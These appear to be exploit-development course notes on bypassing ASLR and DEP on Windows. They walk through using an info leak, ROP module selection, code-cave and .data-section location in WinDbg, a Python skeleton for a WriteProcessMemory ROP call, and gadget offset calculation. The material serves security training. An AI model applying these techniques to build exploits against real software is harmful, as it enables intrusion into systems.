Module 0x0a

Example information leak found via finding the import SymGetSymFromName in Ida. Utilized xref to find where the call was made and confirmed it was possible to recieve the address via a network packet.

After finding an info leak locate a module to use for ROP via windbg:
    lm f

Looking for a module that is included with the software for portability. 

Test for bad bytes through multiple restarts of the first few bytes of the target module address. In the example the address did contain bad bytes in some cases however this was acceptable as the service was restarted  via a watchdog service so the program could be crashed and then tested via the info leak.
Can utilize procmon to watch for "Process Exit" and "Process Start" operations. Can crash the program by attaching windbg and closing it.

Utilizing WriteProcessMemory for DEP bypass.

Can utilize the offset 3c to find the PE header. Then using the offset 2c + the offset to find the offset to the code section.

Alternatively can use lm to find the module start + !address to locate the "End Address" which pointed to the code section in testing.

Once the code section is located utilize !address to find the "End Address" and check protection.

    Utilizing the End Address - {size of payload} a code cave was located. The offset was noted by taking the address of the cave ({end address} - {size of payload}) - {module name} 
        e.g. ?03283000 - 400 - libeay32IBM019

    Code cave results from padding added to the end of a code page if the compiled code does not fill up the full page.

Need to pass a pointer to a writeable location for WriteProcessMemory. Can use !dh to locate the .data section:

    SECTION HEADER #4 
   .data name 
    F018 virtual size 
   D5000 virtual address

Section headers need to be aligned to a page boundry so using the first dword after:
    (libeay32IBM019 + d5000 + f018  + 4) - libeay32IBM019 = offset to .data (0xe401c in example below)
    !vprot to check protect = PAGE_READWRITE


Skeleton for WPM call:
    wpm  = pack("<L", (WPMAddr))               # WriteProcessMemory Address 
    wpm += pack("<L", (dllBase + 0x92c04))  # Shellcode Return Address 
    wpm += pack("<L", (0xFFFFFFFF))               # pseudo Process handle 
    wpm += pack("<L", (dllBase + 0x92c04))  # Code cave address  
    wpm += pack("<L", (0x41414141))               # dummy lpBuffer (Stack address)  
    wpm += pack("<L", (0x42424242))               # dummy nSize 
    wpm += pack("<L", (dllBase + 0xe401c))  # lpNumberOfBytesWritten 
    wpm += b"A" * 0x10

RP++ outputs addresses based off of the prefered base address:
    0x100408d6: push esp ; pop esi ; ret  

    Need to find the imagebase. Can manually check it via:
        0:077> dd libeay32IBM019 + 3c L1 
        031f003c  00000108 
        
        0:077> dd libeay32IBM019 + 108 + 34 L1 
        031f013c  10000000 <--- imagebase

    Gadget offset is thus:
        0x408d6
PreviousASLRNextExtra Mile - Custom_srvr.exe Exploit

Last updated

Was this helpful?